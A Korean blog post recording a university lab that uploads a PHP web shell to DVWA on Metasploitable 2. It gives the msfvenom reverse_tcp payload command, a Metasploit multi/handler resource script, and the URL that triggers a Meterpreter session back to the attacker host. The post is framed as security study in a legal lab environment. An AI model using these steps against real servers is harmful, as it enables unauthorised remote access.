[모의해킹] 웹 서비스 취약점을 이용한 파일 업로드 공격

! 이 포스트의 내용은 (2019년)  전공 강의에서 다룬 리눅스 보안 실습의 기록용이며, 이는 학습 목적으로만 사용되어야 합니다.

! 어떠한 경우에도 이러한 기술을 악용하거나 불법적인 활동에 사용해서는 안 됩니다.

 

! 모의 해킹과 관련된 실습은 합법적인 환경에서만 수행되어야 하며, 무단으로 다른 사람의 시스템에 접근하는 등의 행위는 법적인 문제로 이어질 수 있습니다. 이러한 기술을 사용할 때에는 항상 윤리적인 책임을 갖고 행동해야 합니다.

 

1️⃣ 실습 환경 구성 및 준비

🔹1. 실습 환경 구성

• ``Metasploitable 2``: 취약한 웹 애플리케이션이 포함된 테스트용 가상 머신
• ``DVWA``: 웹 보안 테스트를 위한 취약한 PHP 기반 웹 애플리케이션
• ``Kali Linux``: 공격자가 사용할 수 있는 서버

---

🔹2. Metasploitable의 IP 주소 확인

• Metasploitable의 IP 주소를 확인하여 웹 애플리케이션에 접근할 준비를 한다.

ifconig

---

2️⃣ DVWA 설정 및 접속

🔹1. DVWA 웹 페이지 접속 및 설정 변경

• 칼리 리눅스에서 브라우저를 열고 ``Metasploitable``의 IP 주소를 입력하여 DVWA 사이트에 접속한다.

• 로그인 페이지에서 다음과 같이 입력하여 로그인한다.
  • Username: ``admin``
  • Password: ``password``

• 로그인 후 보안 레벨을 ``Low``로 설정한다.

---

2️⃣ 파일 업로드 공격 실습

🔹1. 악성 웹쉘 생성 및 업로드

웹쉘 생성

• Kali Linux에서 ``msfvenom``을 사용하여 악성 PHP 페이로드를 생성한다.

msfvenom -p php/meterpreter/reverse_tcp lhost=[공격자 IP] lport=[공격자 포트] -f raw

• 생성된 코드를 복사한다. 이 때, 맨 앞에 ``/*``을 제외하고 복사한다.

• 복사한 코드를 파일로 저장한다.

nano /tmp/webshell.php

 

DVWA에 웹쉘 업로드

• DVWA 사이드메뉴에서 ``UPLOAD``를 선택 후 ``tmp/webshell.php`` 파일을 업로드한다.
• 업로드가 성공하면 웹쉘이 서버에 저장된다.
• 만약 보안 레벨이 높으면 php 파일이 업로드 불가하다.

---

🔹2. 멀티 핸들러 설정 및 공격 실행

멀티 핸들러 설정

• Kali Linux에서 ``msfconsole``을 실행하고, 원격 접속을 대기하는 리스너를 설정한다.

nano /root/webshell.rc

• 아래 내용과 같이 msfconsole 명령어를 입력 후 저장한다.

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost [공격자 IP]
set lport [공격자 Port]
exploit

 

공격 실행

• 설정된 리스너 실행한다.

msfconsole -r /root/webshell.rc

• 브라우저에서 업로드된 웹쉘에 접근하여 실행한다.

http://[URL]/dvwa/hackable/uploads/webshell.php

• Kali Linux의 ``msfconsole``에서 Meterpreter 세션이 활성화되면서 원격 접속이 가능해진다.

---